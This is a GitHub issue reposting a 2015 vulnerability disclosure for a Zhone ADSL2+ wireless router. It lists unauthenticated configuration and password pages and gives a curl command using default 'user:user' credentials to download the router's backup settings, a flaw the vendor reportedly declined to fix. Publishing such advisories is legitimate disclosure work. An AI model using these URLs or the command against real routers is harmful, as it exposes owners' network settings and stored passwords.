Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom) #67

Open
hkm opened this issue Sep 30, 2015 · 0 comments

Comments

@hkm
Copy link
Owner

hkm commented Sep 30, 2015

Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Date: 01/09/2015

ZHONE Firmware: 03.02.20

Product Name: 6218-I2-xxx

Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)

Author: Mahmoud Khaled

Contact: [email protected]

Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet

Disclosure Timeline

01/09/2015 Contacted Vendor/Vulnerability Explained
01/09/2015 Vendor Replied Denying Responsibility of The Product
01/09/2015 Full Disclosure

Description

A. The following links can be accessed without any authentication:
http:///pvccfg.cgi
http:///dnscfg.cgi
http:///password.cgi (In addition to text storage of sensitive information)

B. Obtaining backup DSL router configurations by a user account authentication:
curl ""http:///backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant